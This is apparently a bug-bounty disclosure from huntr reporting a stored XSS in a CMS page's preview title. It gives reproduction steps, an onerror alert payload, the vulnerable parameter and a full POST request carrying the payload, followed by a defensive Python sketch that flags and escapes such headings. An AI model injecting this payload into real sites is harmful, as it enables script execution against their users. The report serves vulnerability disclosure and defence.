huntr | Scgajge12 | 6EB3CB9A-5C78-451F-AE76-0B1E62FE5E54
Jul 24, 2023 - 2:53 p.m.

Stored XSS in Preview title

2023-07-24 14:53:36
scgajge12
www.huntr.dev

EPSS: 0.001 (percentile: 23.2%)

Description

There is a stored XSS in the preview title of the page.

Proof of Concept

Step 1. Log in to the administrator screen and create a new page.
Step 2. Insert “Browse preview” from “Add new block” and enter the payload in “Preview title”.
Step 3. Save the page and open the preview screen; the embedded script (alert) is executed.

Payload

<img src=x onerror=alert(document.domain)>

Parameter

o:block[0][o:data][heading]

Request

POST /admin/site/s/test/page/test HTTP/1.1
 ...

o%3Ais_public=1&sitepageform_csrf=f49b093285a9d1c137c456c725a74649-f2ddcd5a1ccc9cb264a38318182dd604&o%3Atitle=test&o%3Aslug=test&o%3Ablock%5B0%5D%5Bo%3Alayout%5D=browsePreview&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bresource_type%5D=items&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bquery%5D=&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blimit%5D=12&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=resource-heading&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=resource-body&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=thumbnail&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bheading%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blink-text%5D=Browse+all
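A defensive sketch for the request above, added here and not part of the report or the affected project's code: it extracts the o:block[N][o:data][heading] values from a page-edit form body, flags those that contain markup, and shows the value output-encoded at render time. The function names, the markup heuristic and the <h2> wrapper are assumptions; the sample body is a shortened copy of the request above.

```python
import html
import re
from urllib.parse import parse_qsl

# Shortened copy of the form body from the request above (CSRF token omitted).
SAMPLE_BODY = (
    "o%3Atitle=test&o%3Aslug=test"
    "&o%3Ablock%5B0%5D%5Bo%3Alayout%5D=browsePreview"
    "&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bresource_type%5D=items"
    "&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bheading%5D="
    "%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E"
    "&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blink-text%5D=Browse+all"
)

# Matches the parameter named in the report, for any block index.
HEADING_KEY = re.compile(r"^o:block\[(\d+)\]\[o:data\]\[heading\]$")
# Tag opener or HTML entity: a plain-text title needs neither (assumed heuristic).
MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z!]|&#|&[a-zA-Z]+;")


def block_headings(body: str) -> dict[int, str]:
    """Return {block index: decoded heading} from a urlencoded page-edit body."""
    found = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = HEADING_KEY.match(key)
        if m:
            found[int(m.group(1))] = value
    return found


def flag_markup(headings: dict[int, str]) -> list[int]:
    """Block indexes whose heading contains markup and should be reviewed."""
    return sorted(i for i, h in headings.items() if MARKUP.search(h))


def render_heading(heading: str) -> str:
    """Output-encode the heading so the browser displays it as text.
    The <h2> wrapper is an assumption about the template."""
    return "<h2>" + html.escape(heading, quote=True) + "</h2>"


if __name__ == "__main__":
    headings = block_headings(SAMPLE_BODY)
    print("flagged blocks:", flag_markup(headings))
    for index, heading in headings.items():
        print(index, render_heading(heading))
```

The flagging step is only a review aid for stored or logged form data; the encoding at output is what stops the stored value from being parsed as HTML.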

PoC Video

https://drive.google.com/file/d/1PIReOl9qiJBUqw9522ctxrHGBvn8JUOI/view?usp=sharing
